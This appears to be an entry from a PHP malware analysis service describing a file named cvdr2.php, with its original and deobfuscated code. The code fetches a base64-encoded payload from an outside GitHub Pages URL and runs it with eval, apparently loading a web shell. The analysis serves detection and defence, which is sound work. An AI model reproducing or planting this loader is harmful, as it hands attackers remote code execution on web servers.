PHP Malware Analysis

Back to list

Filename: cvdr2.php

Tags

Encoding
  • base64_decode
URLs
Execution
  • eval
Files
  • file_get_contents

Deobfuscated code

<?php

$r3d = "https://cavdar59.github.io/alfa";
$l3nin = file_get_contents($r3d);
eval("?>" . base64_decode($l3nin));
?>
<!DOCTYPE html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<div style="display: none;">
<h1>AllFa</h1>
</html>


Original code

<?php
$r3d = "https://cavdar59.github.io/alfa";
$l3nin = file_get_contents($r3d); 
eval("?>".(base64_decode($l3nin)));
?>
<!DOCTYPE html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<div style="display: none;">
<h1>AllFa</h1>
</html>